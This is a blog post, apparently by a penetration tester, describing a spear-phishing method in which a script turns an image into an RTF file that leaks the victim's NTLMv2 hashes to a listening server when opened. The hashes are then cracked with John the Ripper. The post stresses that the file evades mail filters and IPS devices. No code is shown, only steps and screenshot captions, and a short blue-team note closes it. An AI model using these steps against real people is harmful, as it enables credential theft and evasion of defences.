Word Heist!

So, I stumbled upon an interesting script.

Over the years, I have been using various tools and scripts to do spear phishing; with the many vulnerabilities in Microsoft Office Suite and Adobe PDF reader being enablers and the ability to embed macros being an even bigger enabler. But things have changed and users are now keen on the “enable macro warning” and they don’t enable macros anymore 😦

macros warning

…hence most spear phishing attempts fail or are filtered by mail filters, firewalls, IPSs as they are deemed suspicious.

So this was a breath of fresh air and seems to get through most IPSs and security devices.

On your listening server:

Download the script. Put an image of your choice in the folder. I chose elephant.jpg

Start script as below. For this we want to set this server as a listening server hence the 1 after the image. Setting to 0 will not run the listener.

script start

The script is mostly automated and the only hard work is to send the file. Notice below that an *.rtf file (1491333207.rtf) has been generated from the *.jpg (elephant.jpg) image.

file created

This is what we need to send to our victim, and when we need to get really creative..

After sending the *.rtf document to victim:

Wait for victim to open the document, and immediately you notice NTLM hashes being populated on the listening server terminal. At the same time a file, passwords_netntlmv2, which contains NTLMv2 hashes is created. Which brings us to the last step – cracking the hashes..

password hashes

Password cracking

There are many tools to do this, but john the ripper is recommended for various reasons. I used JTR for this illustration as below:

username and password

And voila, passwords of the victim!

Note: it would have definitely taken a longer time depending on the complexity of the password and wordlist used.

From a blue teamers point of view:

  • We see the need for a strong password which should meet password complexity requirements
  • The back connection via port 445 is common especially for meterpreter sessions and this would point, though not necessarily, to an indicator of compromise.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: